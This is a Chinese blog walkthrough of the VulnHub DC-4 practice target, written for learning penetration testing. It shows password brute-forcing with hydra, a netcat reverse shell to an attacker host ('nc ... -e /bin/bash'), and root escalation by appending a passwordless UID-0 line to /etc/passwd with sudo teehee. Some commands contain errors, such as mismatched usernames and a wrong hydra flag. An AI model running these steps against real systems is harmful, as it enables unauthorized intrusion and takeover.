DC-4靶机渗透(teehee提权)

已于 2022-03-26 18:39:16 修改
阅读量4.7k 收藏 1
点赞数
分类专栏: DC靶机-渗透测试 文章标签: 网络 安全
于 2022-03-26 18:37:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/single_g_l/article/details/123687657
版权

目录

一、环境

二、信息收集

1. 主机发现

2. 访问192.168.1.177:80 

三、拿到管理后台密码

 方法1. 用burp爆破模块,获取管理员登录界面的密码

方法2. 用hydra爆破,拿到管理后台的密码,解压rockyou.txt.gz

四、登录后台发现可以执行命令,尝试BP改包,监听靶机

 1. 监听目标端口

2. 改包 

 五、查看 /etc/passwd文件,发现jim,sam用户,想到提权

六、查看jim用户下文件,发现密码本

七、登录jim用户,获取charles用户的密码^xHhA&hvim0y

八、登录Charles,查看root权限

九、teehee提权,获取root权限,拿到flag

一、环境

   靶机: 192.168.1.177

攻击机: 192.168.1.209

二、信息收集

1. 主机发现

namp -sP 192.168.1.0/24 或 arp-scan -l

# 查看开放端口
 nmap -A -sS -p- 192.168.1.177

2. 访问192.168.1.177:80 

三、拿到管理后台密码

 方法1. 用burp爆破模块,获取管理员登录界面的密码

 01. 用burp抓包,爆破拿到密码(记得准备一个常用密码合集,这个你们就自己来吧)

 02. 发送到调试模块(intruder),设置好变量,只爆破密码

 03. 设置payload,开始攻击

 04. 获取密码,登录成功

方法2. 用hydra爆破,拿到管理后台的密码,解压rockyou.txt.gz

01.解压rockyou文件

gzip -d rockyou.txt.gz

  02. hydra 开始破解

gzip -d rockyou.txt.gz #解压rockyou文件获取密码本
hydra -l admin -p /usr/share/wordlists/rockyou.txt 192.168.1.177 http-post-form "/login.php:username=^ USER ^ &password=^ PASS^:S=logout" -F
-l:指定用户
-P:大写指定字典,小写指定具体账户
http-post-form:页面的提交方式
/logic.php:检测账号页面(并非当前登录页面,因为当前登录页面没有回显)
username=^USER^&password=^PASS^:指定变量(页面源码获得)
S=logout:测试是否成功爆破并且返回成功登录页面特有参数,从而判定爆破成功
-F:爆破成功,关闭文件

四、登录后台发现可以执行命令,尝试BP改包,监听靶机

 1. 监听目标端口

在kaili中打开终端: nc -lvvp 1234 
bp中修改命令为:
nc 192.168.1.209 1234 -e /bin/bash

2. 改包 

监听完成,现在可以执行命令啦 

 五、查看 /etc/passwd文件,发现jim,sam用户,想到提权

六、查看jim用户下文件,发现密码本

七、登录jim用户,获取charles用户的密码^xHhA&hvim0y

用hydra开始破解jim用户密码(将bck文件的内容,在kali终端新建一个文件放进去)

hydra -L usr.txt -P dc-4passwd.txt ssh://192.168.1.177  
ssh jim@192.168.1.177

根据提示查看jim邮件

八、登录Charles,查看root权限

sudo -l

提示:/usr/bin/teehee 命令在运行时用于root权限,查看权限 发现可以不需要密码执行teehee。

九、teehee提权,获取root权限,拿到flag

teehee命令可以对文件进行写入操作,我们可以借此来提权。

就是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可。

echo "judy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd    //提权语句
su light
cat /root/flag.txt

小小丸子551
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
生命在于学习——Linux提权
易水哲的博客
11-03 1610
Linux提权的学习笔记记录。
DC-4靶机teehee的两种提权
最新发布
laykr的博客
12-04 423
原理:通过日志更改/bin/bash,使其变成4777也就是suid权限,然后/bin/bash -p强制停下,就有root权限了。原理: 直接修改/etc/passwd文件,追加一个空密码进入/etc/passwd里。东西不多,个人笔记,记录今天的学习成果。1.修改/etc/passwd。2.修改/bin/bash权限。
[Vulnhub] DC-4
weixin_63231007的博客
01-28 819
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
9.100个渗透测试实战#9(DC-4)
qwsn
03-29 2678
时间一切皆可努力 感谢浏览 目录...
DC-4靶场练习—teehee提权
negnegil的博客
06-09 579
DC系列第四个靶机 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 老规矩先扫描以下局域网内的主机ip arp-scan -l 扫一下端口: nmap -A -p- 192.168.1.101 只看放了22和80端口,先进80端口看看有什么 只有一个表单,猜测Username应该是admin,先不急着爆破。 用dirsearch扫了一下目录,只有一个登录界面: 所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
MS08067,MS10061漏洞靶机环境搭建.docx
07-07
MS08067,MS10061漏洞靶机环境搭建过程,演示靶机的搭建过程,用于攻防演练,渗透小白可以看一下
DC-4靶机进行渗透测试
zll___的博客
03-14 432
DC-4靶机进行渗透测试
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4017
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC系列(4)DC-4靶机渗透
Nikris的博客
01-11 859
DC-4
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 617
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4297
dc-4靶场详细渗透过程
DC-4靶机渗透详细教程(附靶机链接)
bwt_D的博客
03-01 5894
靶机链接:https://pan.baidu.com/s/1Bcy6_fOXj4ysZTcBIUOxpw 提取码:eefe 首先查看kali虚拟机的ip地址 ifconfig 可以看到我们kali的虚拟机ip为192.168.159.145 接着使用nmap工具进行扫描,获取靶机的IP地址 nmap -sP 192.168.159.2/24 打开靶机的虚拟机设置,选择网络适配器-高级,查看我们靶机的mac地址。与扫描的结果匹配,发现靶机的IP为192.168.159.142 继续使用namp对靶
渗透测试:DC-4靶机
Ciyaso的博客
08-21 256
一、扫描获取靶机ip arp-scan -l 192.168.203.143 二、获取网站信息 访问网站 1.nmap nmap -sV -A 192.168.203.143 开放了80、22端口 看见22端口开放了ssh 2.Wappaloyzer Web服务器:Nginx 1.15.10 3.BurpSuit 登录,用户名admin,密码随意 用burpsuit拦截 爆破密码 密码:happy 成功登陆 上传命令,继续拦截 先改成ls 也可以使用其他命令 我们尝试反弹shel
【vulnhub】DC-4渗透实战(sudo -l)
qq_45300786的博客
07-06 235
网上一大把通关教程,这里我就说一下思路就好了 首先弱口令爆破,进入web页面,然后在web页面发现一个命令执行,进行反弹shell, 然后sudo -l查看当前用户允许那些命令,发现可以不用输入password以root权限执行 /usr/bin/teehee 直接在/etc/passwd中增加一行,用户名为“hack”,uid和gid都为0,那么这个用户就相当于root。直接su没能成功,重启虚拟机,随后成功su。 echo "hack::0:0:::/bin/bash" | sudo teehee -a
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值